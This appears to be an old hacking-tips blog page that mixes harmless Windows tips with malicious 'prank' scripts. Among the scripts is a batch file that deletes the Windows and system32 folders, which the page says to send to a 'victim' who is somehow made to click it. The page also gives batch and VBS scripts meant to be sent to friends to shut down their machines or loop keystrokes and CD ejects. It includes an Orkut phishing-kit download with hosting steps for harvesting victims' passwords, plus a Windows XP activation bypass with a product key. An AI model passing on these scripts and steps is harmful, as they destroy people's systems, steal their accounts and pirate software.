Advanced Virus Pranks !!!!

Want To Share Something Advanced With You....These Tricks May Be Old /

1.Convey your friend a little message and shut down his / her computer:
Type ----
 

CODE::

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s


Save it as "pirated.BAT" and send it.


2.Toggle your friend's Caps Lock button simultaneously:
Code:


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Save it as "pirated.VBS" and send it.


3.Open Notepad, slowly type "Hello, how are you? I am good, Thanks" and freak your friend out:
Type :


WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "


Save it as "pirated.VBS" and send it.


Speed up Acrobat Reader

Speed up Acrobat Reader
 
 

Do u get irritated when acrobat reader takes time to load when you want to open a pdf document.

Follow these steps to speed up.

 


1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (Don't copy and paste.........Do cut N paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast
and almost as good as notepad..

The New Advanced "Gmail Dot Trick"


So What About About GMAIL [DOT] Trick

 

Suppose There is a Gmail account : iampirated@gmail.com
with password : abcd

You will get logged in to iampirated@gmail.com If you use


email as : iam[DOT]pirated@gmail.com 

(putting '.' between iam & pirated,without quotes)
password : abcd


email as :
i[DOT]ampirated@gmail.com
password : abcd


email as :
iampirated[DOT]@gmail.com
password : abcd


email as :
iampi[DOT]rated@gmail.com
password : abcd

and so on..

That means gmail does not count periods (.)

So you can use this trick for using the same email for various accounts (such as Twitter and others) as they interpret all the above emails as different but Gmail considers it the same.

It was a bit tough to explain the GMAIL DOT trick though.

Calculations on Command Prompt


Calculations on Command Prompt
 
 

The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:

C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
------------


For more information, type set /? at the command prompt.

Hide Your Files In A JPEG

Hide Your Files In A JPEG

Well, did you know you could hide your files in a JPEG file?

For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.

Ok, lets begin…

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\Pirated - RECOMMENDED).

2. Now, add those files in a RAR archive (e.g. anything.rar). This file should also be in the same directory (C:\Pirated).

3. Now, look for a simple JPEG picture file (e.g. image.jpg). Copy/Paste that file also in C:\Pirated

4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\Pirated

5. Now type: “COPY /b image.jpg + anything.rar output.jpg” (without quotes) - Now, image.jpg is the picture you want to show, anything.rar is the file to be hidden, and output.jpg is the file which contains both....

6. Now, after you have done this, you will see a file output.jpg in C:\Pirated Open it (double-click) and it will show the picture you wanted to show.  

Now try opening the same file with WinRAR, it will show the hidden archive .

Phishing Basics {PART-3 }

  (Orkut Phishing)
 

This is the easiest and the best way

 

Download this RAR first

http://rapidshare.com/files/414483987/Orkut.rar


Then make an account on www.justfree.com

Now login to Your account and go to file manager

Then uplaod any one of the page u desire from the rar with the google logo in it and with the login.txt file + the mailer.php file

DONE!!!!

How To Use....

When You will Send The link (Which You Get From Your Hosting) To Victim, then as He/Her Click on the link then A New Orkut Login Page Will Open.

As The Victim Fill the Entries(i.e. Username,Password)And Click On Sign In Button

His Account Information Will Record in The Password.txt File of Your Hosting Account !!!!


Advanced Validation of Windows XP


Advanced Validation of Windows XP:

 

1- Click in start and then in run

2- Type in regedit and then ok

3- In the regedit, go to this following key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WPAEvents


4- On the right panel, double click in OOBETimer

5- In the opened window delete all values and click OK. Shut the regedit

6- Go again in start > run and this time type:

%systemroot%\system32\oobe\msoobe.exe /a

7- In the window that oppened, choose the option... YES I WISH TO MAKE A PHONE CALL... ( or something similar to this sentence )

8- In the next step, click in the button that says CHANGE PRODUCT KEY ( or something similar )

9- In the next step, type a CD-Key:

THMPV-77D6F-94376-8HGKG-VRDRQ and click to update

10- After clicking in the update button, the assistant to activation will return one page, then click in " remember me later ", and restart Windows again.

11- Restart Windows, go again in start > run and type:

%systemroot%\system32\oobe\msoobe.exe /a

12- The following message will appear:

Windows activation

Windows is now activated

Advanced DOS Commands


-- Advanced DOS commands --

 

 

Accessibility Controls - access.cpl
Add Hardware Wizard - hdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Adobe Photoshop (if installed) - photoshop
Administrative Tools - control admintools
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard - fsquirt
Calculator – calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)* - directx.cpl
Direct X Troubleshooter - dxdiag
Disk Cleanup Utility - cleanmgr
Disk Defragment - dfrg.msc
Disk Management - diskmgmt.msc
Disk Partition Manager - diskpart
Display Properties - control desktop
Display Properties - desk.cpl
Display Properties (w/Appearance Tab Preselected) - control color
Dr. Watson System Troubleshooting Utility - drwtsn32
Driver Verifier Utility - verifier
Event Viewer - eventvwr.msc
File Signature Verification Tool - sigverif
Findfast - findfast.cpl
Folders Properties - control folders
Fonts - control fonts
Fonts Folder - fonts
Free Cell Card Game - freecell
Game Controllers - joy.cpl
Group Policy Editor (XP Prof) - gpedit.msc
Hearts Card Game - mshearts
Iexpress Wizard - iexpress
Indexing Service - ciadv.msc
Internet Explorer – iexplore
Internet Properties - inetcpl.cpl

Advanced Way To See System Log


Advanced Way To See System Log
Go to

start > run >eventvwr.msc

Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.


For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.


Look for a date and time when you weren't home and your computer should have been off.

double click on it and it will show You the detail.

You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.

Block Website Without Any Software

How To Block Websties Without Software

Steps:

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!

-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

www.blockedsite.com is now unaccessable


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

As: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com

Check Your Antivirus Working Properly

Open notepad
 

Copy this code in the text file....

 

"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

without qutoes....

then save it with the name /fakevirus.exe/

If this file got deleted immediately ....that means ur antivirus is working n updated ....

Small Virus

SMALL VIRUS
 
copy the code /without quotes/ into notepad and save it as something.vbs
 

"Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
"


if u run this your cd-rom will automatically open and close
to stop this go to taskmanager-process-wscript.exe-and end the process .

Make A PC Go Abnormal

Make a pc go Abnormal....

Commands Are :

Code:

@echo off
@del c:\windows\
@del c:\windows\system32\
pause
end



copy n paste the code in ur note pad....save it as any name.BAT file.....thats all.....u can send it to the victim n somehow make him/her click it.After Clicking on it...His/Her PC Goes Abnormal

Phishing Basics {PART-2 }


  • Link in e-mail message directs the user to a Web page
  • Asks for financial information
  • Page looks genuine
  • Easy to fake valid Web site
  • Any HTML page on the real Web can be copied and modified
  • E-mails sent to people on selected lists or to any list
  • Some % will actually have account
  • "Phishing kit" Includes
  1. Set of software tools.
  2. Help novice phisher imitate target Web site.
  3. Make mass mailings.
  4. May include lists of e-mail addresses.


    Phishing Basics {PART-1 }


    • Pronounced "fishing".
    • Scam to steal valuable information such as credit cards, social security numbers, user IDs and passwords.
    • Also known as "brand spoofing".


    • Official-looking e-mail sent to potential victims ,Such As
    • Due to internal accounting errors or some other pretext, certain information must be updated to continue the service

    Hackers: 3 Types


    All 3 types of hackers may have detailed knowledge of system security and programming, but how they use their knowledge is what makes them very different.


    1. Black-hat hackers (also known as crackers) are the ones who write virii, destroy data, and deface websites along with other illegal activity. This type of hacker will not end up at a very good job due to a bad reputation, and usually ends up in jail for a long period of time.


    2. Grey-hat hackers are borderline white/black hats. They sometimes prank unsuspecting users and cause general mayhem. While they think this kind of activity is harmless, they may face long periods of jail time, and rejection from the hacker community.

    3. White-hat hackers are the Jedi-knights of hacking, using their knowledge for good, and usually end up working as high-paid network admins, programmers, and security consultants. When a software bug is found, the white-hat community will work together to solve the problem. This kind of hacker is the most respected in the internet community.

    Hmm !!! Let's Start



    You are probably very excited to start hacking, and you should know that being a hacker is an adrenaline rush as well as fullfilling. To begin hacking, you need to learn a programming language such as(c/c++/perl/php/java) and study certain operating systems such as(windows NT,2000/Linux/Unix). Ask other hackers what they use and why, then choose one and stick to it. It can take several months to learn the basics of one of these technologies, and years to master. If you can’t spend at least a half hour a day to advance your computer skills, then hacking may not be for you.

    After learning an advanced operating system, and/or programming, you will be able to understand how exploits work and how systems are compromised. Its best to read up in the exploits section of Site,After gaining this knowledge, you will begin to develop skills necessary to protect yours or anothers system or program from crackers.

    IAMPIRATED can help you to advance your computer skills by providing a place to ask questions, read articles, and see how exploits work.

    You should know what a lamer is considered as, No-one likes to be around lamers, so you should avoid ‘lame’ behaviour at all costs.


    A lamer is not a hacker. Someone is classified as a lamer when:

    1: They ask others to break into email accounts, or deface websites for them.

    2: They talk about sub7 or Back Oriface.

    3: They ask alot of questions, but arent willing to read articles,books, or investigate on their own.

    4: They ask others to do any illegal activity for any reason.

    Technology is constantly changing, and it is important for you to stay current if you are a hacker. Visit some of the sites listed in the links section . Stay current with the hacker news, and contribute what you can to the community.
    To Sum it all up:

    1. Study an operating system such as: Linux/Unix/WinNt,2000,XP.
    2. Learn at least one programming language.
    3. Learn how networking technologies work (TCP/IP,Ethernet,FDDI) etc.
    4. Study how exploits work and participate in wargames.
    5. Avoid being lame.
    6. Read articles, ask lots of questions and never stop learning.



    That's All I We Want To Say. Have A Nice Day.

    The Pirated Intelligence # Great Cyber Security Resource to provide a Safe and Secure Internet

    Powered By Blogger

    Pages

    Powered by Blogger.

    Logo

    Logo